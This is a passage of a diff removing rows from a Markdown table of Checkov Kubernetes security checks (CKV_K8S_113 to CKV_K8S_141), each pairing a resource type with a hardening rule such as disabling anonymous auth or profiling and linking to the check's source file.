-| 3281 | CKV_K8S_113              | resource                         | StatefulSet                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [ControllerManagerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ControllerManagerBindAddress.py)                                                              |
-| 3282 | CKV_K8S_114              | resource                         | CronJob                                                                                          | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3283 | CKV_K8S_114              | resource                         | DaemonSet                                                                                        | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3284 | CKV_K8S_114              | resource                         | Deployment                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3285 | CKV_K8S_114              | resource                         | DeploymentConfig                                                                                 | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3286 | CKV_K8S_114              | resource                         | Job                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3287 | CKV_K8S_114              | resource                         | Pod                                                                                              | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3288 | CKV_K8S_114              | resource                         | PodTemplate                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3289 | CKV_K8S_114              | resource                         | ReplicaSet                                                                                       | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3290 | CKV_K8S_114              | resource                         | ReplicationController                                                                            | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3291 | CKV_K8S_114              | resource                         | StatefulSet                                                                                      | Ensure that the --profiling argument is set to false                                                                                                                                                     | Kubernetes              | [SchedulerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerProfiling.py)                                                                                  |
-| 3292 | CKV_K8S_115              | resource                         | CronJob                                                                                          | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3293 | CKV_K8S_115              | resource                         | DaemonSet                                                                                        | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3294 | CKV_K8S_115              | resource                         | Deployment                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3295 | CKV_K8S_115              | resource                         | DeploymentConfig                                                                                 | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3296 | CKV_K8S_115              | resource                         | Job                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3297 | CKV_K8S_115              | resource                         | Pod                                                                                              | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3298 | CKV_K8S_115              | resource                         | PodTemplate                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3299 | CKV_K8S_115              | resource                         | ReplicaSet                                                                                       | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3300 | CKV_K8S_115              | resource                         | ReplicationController                                                                            | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3301 | CKV_K8S_115              | resource                         | StatefulSet                                                                                      | Ensure that the --bind-address argument is set to 127.0.0.1                                                                                                                                              | Kubernetes              | [SchedulerBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/SchedulerBindAddress.py)                                                                              |
-| 3302 | CKV_K8S_116              | resource                         | CronJob                                                                                          | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3303 | CKV_K8S_116              | resource                         | DaemonSet                                                                                        | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3304 | CKV_K8S_116              | resource                         | Deployment                                                                                       | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3305 | CKV_K8S_116              | resource                         | DeploymentConfig                                                                                 | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3306 | CKV_K8S_116              | resource                         | Job                                                                                              | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3307 | CKV_K8S_116              | resource                         | Pod                                                                                              | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3308 | CKV_K8S_116              | resource                         | PodTemplate                                                                                      | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3309 | CKV_K8S_116              | resource                         | ReplicaSet                                                                                       | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3310 | CKV_K8S_116              | resource                         | ReplicationController                                                                            | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3311 | CKV_K8S_116              | resource                         | StatefulSet                                                                                      | Ensure that the --cert-file and --key-file arguments are set as appropriate                                                                                                                              | Kubernetes              | [EtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdCertAndKey.py)                                                                                          |
-| 3312 | CKV_K8S_117              | resource                         | CronJob                                                                                          | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3313 | CKV_K8S_117              | resource                         | DaemonSet                                                                                        | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3314 | CKV_K8S_117              | resource                         | Deployment                                                                                       | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3315 | CKV_K8S_117              | resource                         | DeploymentConfig                                                                                 | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3316 | CKV_K8S_117              | resource                         | Job                                                                                              | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3317 | CKV_K8S_117              | resource                         | Pod                                                                                              | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3318 | CKV_K8S_117              | resource                         | PodTemplate                                                                                      | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3319 | CKV_K8S_117              | resource                         | ReplicaSet                                                                                       | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3320 | CKV_K8S_117              | resource                         | ReplicationController                                                                            | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3321 | CKV_K8S_117              | resource                         | StatefulSet                                                                                      | Ensure that the --client-cert-auth argument is set to true                                                                                                                                               | Kubernetes              | [EtcdClientCertAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdClientCertAuth.py)                                                                                  |
-| 3322 | CKV_K8S_118              | resource                         | CronJob                                                                                          | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3323 | CKV_K8S_118              | resource                         | DaemonSet                                                                                        | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3324 | CKV_K8S_118              | resource                         | Deployment                                                                                       | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3325 | CKV_K8S_118              | resource                         | DeploymentConfig                                                                                 | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3326 | CKV_K8S_118              | resource                         | Job                                                                                              | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3327 | CKV_K8S_118              | resource                         | Pod                                                                                              | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3328 | CKV_K8S_118              | resource                         | PodTemplate                                                                                      | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3329 | CKV_K8S_118              | resource                         | ReplicaSet                                                                                       | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3330 | CKV_K8S_118              | resource                         | ReplicationController                                                                            | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3331 | CKV_K8S_118              | resource                         | StatefulSet                                                                                      | Ensure that the --auto-tls argument is not set to true                                                                                                                                                   | Kubernetes              | [EtcdAutoTls.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdAutoTls.py)                                                                                                |
-| 3332 | CKV_K8S_119              | resource                         | CronJob                                                                                          | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3333 | CKV_K8S_119              | resource                         | DaemonSet                                                                                        | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3334 | CKV_K8S_119              | resource                         | Deployment                                                                                       | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3335 | CKV_K8S_119              | resource                         | DeploymentConfig                                                                                 | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3336 | CKV_K8S_119              | resource                         | Job                                                                                              | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3337 | CKV_K8S_119              | resource                         | Pod                                                                                              | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3338 | CKV_K8S_119              | resource                         | PodTemplate                                                                                      | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3339 | CKV_K8S_119              | resource                         | ReplicaSet                                                                                       | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3340 | CKV_K8S_119              | resource                         | ReplicationController                                                                            | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3341 | CKV_K8S_119              | resource                         | StatefulSet                                                                                      | Ensure that the --peer-cert-file and --peer-key-file arguments are set as appropriate                                                                                                                    | Kubernetes              | [EtcdPeerFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/EtcdPeerFiles.py)                                                                                            |
-| 3342 | CKV_K8S_121              | resource                         | Pod                                                                                              | Ensure that the --peer-client-cert-auth argument is set to true                                                                                                                                          | Kubernetes              | [PeerClientCertAuthTrue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/PeerClientCertAuthTrue.py)                                                                          |
-| 3343 | CKV_K8S_138              | resource                         | CronJob                                                                                          | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3344 | CKV_K8S_138              | resource                         | DaemonSet                                                                                        | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3345 | CKV_K8S_138              | resource                         | Deployment                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3346 | CKV_K8S_138              | resource                         | DeploymentConfig                                                                                 | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3347 | CKV_K8S_138              | resource                         | Job                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3348 | CKV_K8S_138              | resource                         | Pod                                                                                              | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3349 | CKV_K8S_138              | resource                         | PodTemplate                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3350 | CKV_K8S_138              | resource                         | ReplicaSet                                                                                       | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3351 | CKV_K8S_138              | resource                         | ReplicationController                                                                            | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3352 | CKV_K8S_138              | resource                         | StatefulSet                                                                                      | Ensure that the --anonymous-auth argument is set to false                                                                                                                                                | Kubernetes              | [KubeletAnonymousAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAnonymousAuth.py)                                                                              |
-| 3353 | CKV_K8S_139              | resource                         | CronJob                                                                                          | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3354 | CKV_K8S_139              | resource                         | DaemonSet                                                                                        | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3355 | CKV_K8S_139              | resource                         | Deployment                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3356 | CKV_K8S_139              | resource                         | DeploymentConfig                                                                                 | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3357 | CKV_K8S_139              | resource                         | Job                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3358 | CKV_K8S_139              | resource                         | Pod                                                                                              | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3359 | CKV_K8S_139              | resource                         | PodTemplate                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3360 | CKV_K8S_139              | resource                         | ReplicaSet                                                                                       | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3361 | CKV_K8S_139              | resource                         | ReplicationController                                                                            | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3362 | CKV_K8S_139              | resource                         | StatefulSet                                                                                      | Ensure that the --authorization-mode argument is not set to AlwaysAllow                                                                                                                                  | Kubernetes              | [KubeletAuthorizationModeNotAlwaysAllow.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletAuthorizationModeNotAlwaysAllow.py)                                          |
-| 3363 | CKV_K8S_140              | resource                         | CronJob                                                                                          | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3364 | CKV_K8S_140              | resource                         | DaemonSet                                                                                        | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3365 | CKV_K8S_140              | resource                         | Deployment                                                                                       | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3366 | CKV_K8S_140              | resource                         | DeploymentConfig                                                                                 | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3367 | CKV_K8S_140              | resource                         | Job                                                                                              | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3368 | CKV_K8S_140              | resource                         | Pod                                                                                              | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3369 | CKV_K8S_140              | resource                         | PodTemplate                                                                                      | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3370 | CKV_K8S_140              | resource                         | ReplicaSet                                                                                       | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3371 | CKV_K8S_140              | resource                         | ReplicationController                                                                            | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3372 | CKV_K8S_140              | resource                         | StatefulSet                                                                                      | Ensure that the --client-ca-file argument is set as appropriate                                                                                                                                          | Kubernetes              | [KubeletClientCa.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletClientCa.py)                                                                                        |
-| 3373 | CKV_K8S_141              | resource                         | CronJob                                                                                          | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3374 | CKV_K8S_141              | resource                         | DaemonSet                                                                                        | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3375 | CKV_K8S_141              | resource                         | Deployment                                                                                       | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
-| 3376 | CKV_K8S_141              | resource                         | DeploymentConfig                                                                                 | Ensure that the --read-only-port argument is set to 0                                                                                                                                                    | Kubernetes              | [KubeletReadOnlyPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletReadOnlyPort.py)                                                                                |
